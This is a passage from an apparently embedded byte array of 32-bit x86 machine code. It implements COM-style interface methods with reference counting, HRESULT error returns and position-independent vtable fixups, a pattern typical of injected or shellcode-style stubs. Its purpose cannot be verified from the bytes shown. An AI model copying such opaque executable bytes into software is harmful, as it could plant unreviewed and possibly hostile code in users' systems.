1385 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00,
1386 0x89, 0x50, 0x04, 0xe8, 0x2c, 0x10, 0x00, 0x00, 0xba, 0xfa, 0x52, 0x40,
1387 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1388 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x08, 0xe8, 0x11, 0x10, 0x00, 0x00, 0xba,
1389 0x43, 0x54, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1390 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x0c, 0xe8, 0xf6, 0x0f,
1391 0x00, 0x00, 0xba, 0x2d, 0x53, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
1392 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x10,
1393 0xe8, 0xdb, 0x0f, 0x00, 0x00, 0xba, 0x68, 0x54, 0x40, 0x00, 0xb9, 0x14,
1394 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00,
1395 0x89, 0x50, 0x14, 0xe8, 0xc0, 0x0f, 0x00, 0x00, 0xba, 0x74, 0x54, 0x40,
1396 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1397 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x18, 0xe8, 0xa5, 0x0f, 0x00, 0x00, 0xba,
1398 0x80, 0x54, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1399 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x1c, 0xe8, 0x8a, 0x0f,
1400 0x00, 0x00, 0xba, 0xb6, 0x53, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
1401 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x20,
1402 0xe8, 0x6f, 0x0f, 0x00, 0x00, 0xba, 0x8c, 0x54, 0x40, 0x00, 0xb9, 0x14,
1403 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0xf4, 0x8b, 0x00,
1404 0x89, 0x50, 0x24, 0xe8, 0x54, 0x0f, 0x00, 0x00, 0xba, 0x98, 0x54, 0x40,
1405 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1406 0xf4, 0x8b, 0x00, 0x89, 0x50, 0x28, 0x8b, 0x45, 0xf4, 0xc7, 0x40, 0x04,
1407 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8b, 0x55, 0x08, 0x89, 0x50,
1408 0x2c, 0x90, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b, 0x45,
1409 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0x10, 0x00, 0x75, 0x0a, 0xb8, 0x03,
1410 0x40, 0x00, 0x80, 0xe9, 0xc3, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x8b,
1411 0x40, 0x2c, 0x8d, 0x90, 0x04, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
1412 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89,
1413 0x14, 0x24, 0xe8, 0x68, 0x12, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x27, 0x8b,
1414 0x45, 0xf4, 0x8b, 0x40, 0x2c, 0x8d, 0x90, 0xb4, 0x08, 0x00, 0x00, 0xc7,
1415 0x44, 0x24, 0x08, 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44,
1416 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8, 0x41, 0x12, 0x00, 0x00, 0x85, 0xc0,
1417 0x75, 0x1d, 0x8b, 0x45, 0x10, 0x8b, 0x55, 0x08, 0x89, 0x10, 0x8b, 0x45,
1418 0x08, 0x89, 0x04, 0x24, 0xe8, 0x66, 0x00, 0x00, 0x00, 0x83, 0xec, 0x04,
1419 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x58, 0x8b, 0x45, 0xf4, 0x8b, 0x40,
1420 0x2c, 0x8d, 0x90, 0xc4, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10,
1421 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14,
1422 0x24, 0xe8, 0xfd, 0x11, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x23, 0x8b, 0x45,
1423 0xf4, 0x8d, 0x50, 0x08, 0x8b, 0x45, 0x10, 0x89, 0x10, 0x8b, 0x45, 0xf4,
1424 0x83, 0xc0, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x23, 0x03, 0x00, 0x00, 0x83,
1425 0xec, 0x04, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0e, 0x8b, 0x45, 0x10,
1426 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc9,
1427 0xc2, 0x0c, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08,
1428 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x83, 0xc0, 0x04, 0x89, 0x45, 0xf8,
1429 0x8b, 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10,
1430 0x8b, 0x45, 0xfc, 0x8b, 0x40, 0x04, 0xc9, 0xc2, 0x04, 0x00, 0x55, 0x89,
1431 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xfc, 0x8b, 0x45,
1432 0xfc, 0x83, 0xc0, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x55, 0xf4, 0xb8, 0x01,
1433 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1,
1434 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xf8, 0xc9, 0xc2, 0x04,
1435 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b, 0x45, 0x08, 0x89, 0x45,
1436 0xf4, 0x8b, 0x45, 0x10, 0x83, 0xe0, 0x02, 0x85, 0xc0, 0x74, 0x31, 0x83,
1437 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x62,
1438 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x1c, 0x8b, 0x00, 0x8b, 0x40, 0x04, 0x8b,
1439 0x55, 0xf4, 0x8b, 0x52, 0x1c, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
1440 0x04, 0x8b, 0x45, 0xf4, 0x8b, 0x50, 0x1c, 0x8b, 0x45, 0x18, 0x89, 0x10,
1441 0x8b, 0x45, 0x10, 0x83, 0xe0, 0x01, 0x85, 0xc0, 0x74, 0x2f, 0x83, 0x7d,
1442 0x14, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x27, 0x8b,
1443 0x45, 0xf4, 0x8b, 0x40, 0x14, 0x8b, 0x40, 0x04, 0x8b, 0x55, 0xf4, 0x83,
1444 0xc2, 0x14, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b, 0x45,
1445 0xf4, 0x8d, 0x50, 0x14, 0x8b, 0x45, 0x14, 0x89, 0x10, 0xb8, 0x00, 0x00,
1446 0x00, 0x00, 0xc9, 0xc2, 0x14, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x48,
1447 0xc7, 0x45, 0xd0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xcc, 0x00, 0x00,
1448 0x00, 0x00, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
1449 0x08, 0x20, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00,
1450 0x00, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0x40, 0x10, 0x00, 0x00,
1451 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x8b, 0x40, 0x0c, 0x8d, 0x55, 0xd4, 0x89,
1452 0x54, 0x24, 0x04, 0x8b, 0x55, 0x0c, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
1453 0xec, 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0x2b, 0x8b,
1454 0x45, 0x0c, 0x8b, 0x00, 0x8b, 0x40, 0x10, 0x8d, 0x55, 0xc8, 0x89, 0x54,
1455 0x24, 0x0c, 0x8d, 0x55, 0xcc, 0x89, 0x54, 0x24, 0x08, 0x8d, 0x55, 0xd0,
1456 0x89, 0x54, 0x24, 0x04, 0x8b, 0x55, 0x0c, 0x89, 0x14, 0x24, 0xff, 0xd0,
1457 0x83, 0xec, 0x10, 0x89, 0x45, 0xf4, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xc9,
1458 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b, 0x45, 0x08,
1459 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x2c, 0x8b, 0x40, 0x4c,
1460 0xff, 0xd0, 0x8b, 0x55, 0x0c, 0x89, 0x02, 0xb8, 0x00, 0x00, 0x00, 0x00,
1461 0xc9, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1462 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1463 0x5d, 0xc2, 0x0c, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1464 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1465 0x5d, 0xc2, 0x04, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x00, 0x00, 0x00, 0x00,
1466 0x5d, 0xc2, 0x04, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x08, 0xe8, 0x65,
1467 0x0c, 0x00, 0x00, 0xba, 0x46, 0x55, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40,
1468 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x10,
1469 0xe8, 0x4b, 0x0c, 0x00, 0x00, 0xba, 0xd6, 0x55, 0x40, 0x00, 0xb9, 0x14,
1470 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00,
1471 0x89, 0x50, 0x04, 0xe8, 0x30, 0x0c, 0x00, 0x00, 0xba, 0xfb, 0x55, 0x40,
1472 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45,
1473 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x08, 0xe8, 0x15, 0x0c, 0x00, 0x00, 0xba,
1474 0x28, 0x56, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1475 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x0c, 0xe8, 0xfa, 0x0b,
1476 0x00, 0x00, 0xba, 0x34, 0x56, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00,
1477 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x10,
1478 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
1479 0x0c, 0x8b, 0x55, 0x08, 0x89, 0x50, 0x08, 0x90, 0xc9, 0xc3, 0x55, 0x89,
1480 0xe5, 0x83, 0xec, 0x18, 0x83, 0x7d, 0x10, 0x00, 0x75, 0x07, 0xb8, 0x03,
1481 0x40, 0x00, 0x80, 0xeb, 0x79, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8d,
1482 0x90, 0x04, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10, 0x00, 0x00,
1483 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8,
1484 0x17, 0x0f, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x27, 0x8b, 0x45, 0x08, 0x8b,
1485 0x40, 0x08, 0x8d, 0x90, 0xc4, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
1486 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89,
1487 0x14, 0x24, 0xe8, 0xf0, 0x0e, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x1d, 0x8b,
1488 0x45, 0x10, 0x8b, 0x55, 0x08, 0x89, 0x10, 0x8b, 0x45, 0x08, 0x89, 0x04,
1489 0x24, 0xe8, 0x1c, 0x00, 0x00, 0x00, 0x83, 0xec, 0x04, 0xb8, 0x00, 0x00,
1490 0x00, 0x00, 0xeb, 0x0e, 0x8b, 0x45, 0x10, 0xc7, 0x00, 0x00, 0x00, 0x00,
1491 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc9, 0xc2, 0x0c, 0x00, 0x55, 0x89,
1492 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83, 0xc0, 0x04, 0x89, 0x45,
1493 0xfc, 0x8b, 0x45, 0xfc, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1,
1494 0x10, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x04, 0xc9, 0xc2, 0x04, 0x00, 0x55,
1495 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83, 0xc0, 0x04, 0x89,
1496 0x45, 0xf8, 0x8b, 0x55, 0xf8, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8,
1497 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45,
1498 0xfc, 0x8b, 0x45, 0xfc, 0xc9, 0xc2, 0x04, 0x00, 0x55, 0x89, 0xe5, 0xb8,
1499 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8,
1500 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x53,
1501 0x81, 0xec, 0x24, 0x02, 0x00, 0x00, 0xe8, 0xc5, 0x0a, 0x00, 0x00, 0xba,
1502 0x0d, 0x5a, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1503 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x10, 0xe8, 0xab, 0x0a, 0x00,
1504 0x00, 0xba, 0xb9, 0x5a, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1505 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x04, 0xe8,
1506 0x90, 0x0a, 0x00, 0x00, 0xba, 0xde, 0x5a, 0x40, 0x00, 0xb9, 0x14, 0x61,
1507 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1508 0x50, 0x08, 0xe8, 0x75, 0x0a, 0x00, 0x00, 0xba, 0x0b, 0x5b, 0x40, 0x00,
1509 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1510 0x8b, 0x00, 0x89, 0x50, 0x0c, 0xe8, 0x5a, 0x0a, 0x00, 0x00, 0xba, 0x2d,
1511 0x5b, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1512 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x10, 0xe8, 0x3f, 0x0a, 0x00,
1513 0x00, 0xba, 0x6d, 0x5b, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1514 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x14, 0xe8,
1515 0x24, 0x0a, 0x00, 0x00, 0xba, 0xa5, 0x5b, 0x40, 0x00, 0xb9, 0x14, 0x61,
1516 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1517 0x50, 0x18, 0xe8, 0x09, 0x0a, 0x00, 0x00, 0xba, 0x0b, 0x5c, 0x40, 0x00,
1518 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1519 0x8b, 0x00, 0x89, 0x50, 0x1c, 0xe8, 0xee, 0x09, 0x00, 0x00, 0xba, 0x17,
1520 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1521 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x20, 0xe8, 0xd3, 0x09, 0x00,
1522 0x00, 0xba, 0x23, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1523 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x24, 0xe8,
1524 0xb8, 0x09, 0x00, 0x00, 0xba, 0x2f, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1525 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1526 0x50, 0x28, 0xe8, 0x9d, 0x09, 0x00, 0x00, 0xba, 0x3b, 0x5c, 0x40, 0x00,
1527 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1528 0x8b, 0x00, 0x89, 0x50, 0x2c, 0xe8, 0x82, 0x09, 0x00, 0x00, 0xba, 0x47,
1529 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1530 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x30, 0xe8, 0x67, 0x09, 0x00,
1531 0x00, 0xba, 0x5d, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1532 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x34, 0xe8,
1533 0x4c, 0x09, 0x00, 0x00, 0xba, 0x9d, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1534 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1535 0x50, 0x38, 0xe8, 0x31, 0x09, 0x00, 0x00, 0xba, 0xa9, 0x5c, 0x40, 0x00,
1536 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1537 0x8b, 0x00, 0x89, 0x50, 0x3c, 0xe8, 0x16, 0x09, 0x00, 0x00, 0xba, 0xb5,
1538 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1539 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x40, 0xe8, 0xfb, 0x08, 0x00,
1540 0x00, 0xba, 0xc1, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1541 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x44, 0xe8,
1542 0xe0, 0x08, 0x00, 0x00, 0xba, 0xcd, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1543 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1544 0x50, 0x48, 0xe8, 0xc5, 0x08, 0x00, 0x00, 0xba, 0xd9, 0x5c, 0x40, 0x00,
1545 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1546 0x8b, 0x00, 0x89, 0x50, 0x4c, 0xe8, 0xaa, 0x08, 0x00, 0x00, 0xba, 0xe5,
1547 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1548 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x50, 0xe8, 0x8f, 0x08, 0x00,
1549 0x00, 0xba, 0xf1, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1550 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x54, 0xe8,
1551 0x74, 0x08, 0x00, 0x00, 0xba, 0xfd, 0x5c, 0x40, 0x00, 0xb9, 0x14, 0x61,
1552 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1553 0x50, 0x58, 0xe8, 0x59, 0x08, 0x00, 0x00, 0xba, 0x09, 0x5d, 0x40, 0x00,
1554 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1555 0x8b, 0x00, 0x89, 0x50, 0x5c, 0xe8, 0x3e, 0x08, 0x00, 0x00, 0xba, 0x15,
1556 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1557 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x60, 0xe8, 0x23, 0x08, 0x00,
1558 0x00, 0xba, 0x21, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1559 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x64, 0xe8,
1560 0x08, 0x08, 0x00, 0x00, 0xba, 0x44, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61,
1561 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89,
1562 0x50, 0x68, 0xe8, 0xed, 0x07, 0x00, 0x00, 0xba, 0x50, 0x5d, 0x40, 0x00,
1563 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c,
1564 0x8b, 0x00, 0x89, 0x50, 0x6c, 0xe8, 0xd2, 0x07, 0x00, 0x00, 0xba, 0x5c,
1565 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1566 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x70, 0xe8, 0xb7, 0x07, 0x00,
1567 0x00, 0xba, 0x68, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29,
1568 0xca, 0x01, 0xc2, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x89, 0x50, 0x74, 0x8b,
1569 0x45, 0x0c, 0xc7, 0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c,
1570 0x8b, 0x55, 0x08, 0x89, 0x50, 0x14, 0x8b, 0x45, 0x08, 0x8d, 0x90, 0xed,
1571 0x05, 0x00, 0x00, 0x8d, 0x85, 0xf2, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24,
1572 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8,
1573 0x73, 0xc0, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xa4, 0x00, 0x00,
1574 0x00, 0x8b, 0x55, 0x0c, 0x83, 0xc2, 0x04, 0x89, 0x54, 0x24, 0x04, 0x8d,
1575 0x95, 0xf2, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
1576 0x08, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0x33, 0x8b, 0x45,
1577 0x0c, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b, 0x40, 0x18, 0x8b, 0x55, 0x0c,
1578 0x8d, 0x5a, 0x08, 0x8b, 0x55, 0x08, 0x8d, 0x8a, 0x94, 0x08, 0x00, 0x00,
1579 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x04, 0x89, 0x5c, 0x24, 0x08, 0x89, 0x4c,
1580 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45,
1581 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5,
1582 0x83, 0xec, 0x18, 0x83, 0x7d, 0x10, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40,
1583 0x00, 0x80, 0xe9, 0x92, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x40,
1584 0x14, 0x8d, 0x90, 0x04, 0x08, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10,
1585 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x89, 0x14,
1586 0x24, 0xe8, 0x4d, 0x0a, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x4e, 0x8b, 0x45,
1587 0x08, 0x8b, 0x40, 0x14, 0x8d, 0x90, 0x14, 0x08, 0x00, 0x00, 0xc7, 0x44,
1588 0x24, 0x08, 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24,
1589 0x04, 0x89, 0x14, 0x24, 0xe8, 0x26, 0x0a, 0x00, 0x00, 0x85, 0xc0, 0x74,
1590 0x27, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x14, 0x8d, 0x90, 0x94, 0x08, 0x00,
1591 0x00, 0xc7, 0x44, 0x24, 0x08, 0x10, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c,
1592 0x89, 0x44, 0x24, 0x04, 0x89, 0x14, 0x24, 0xe8, 0xff, 0x09, 0x00, 0x00,
1593 0x85, 0xc0, 0x75, 0x0f, 0x8b, 0x45, 0x10, 0x8b, 0x55, 0x08, 0x89, 0x10,
1594 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0e, 0x8b, 0x45, 0x10, 0xc7, 0x00,
1595 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0xc9, 0xc2, 0x0c,
1596 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83, 0xc0,
1597 0x10, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0xba, 0x01, 0x00, 0x00, 0x00,
1598 0xf0, 0x0f, 0xc1, 0x10, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x10, 0xc9, 0xc2,
1599 0x04, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0x8b, 0x45, 0x08, 0x83,
1600 0xc0, 0x10, 0x89, 0x45, 0xf8, 0x8b, 0x55, 0xf8, 0xb8, 0x01, 0x00, 0x00,
1601 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01,
1602 0xc8, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0xc9, 0xc2, 0x04, 0x00, 0x55,
1603 0x89, 0xe5, 0x83, 0x7d, 0x0c, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00,
1604 0x80, 0xeb, 0x0e, 0x8b, 0x45, 0x0c, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00,
1605 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5,
1606 0x83, 0xec, 0x18, 0x83, 0x7d, 0x14, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40,
1607 0x00, 0x80, 0xeb, 0x29, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8b, 0x00,
1608 0x8b, 0x40, 0x04, 0x8b, 0x55, 0x08, 0x8b, 0x52, 0x08, 0x89, 0x14, 0x24,
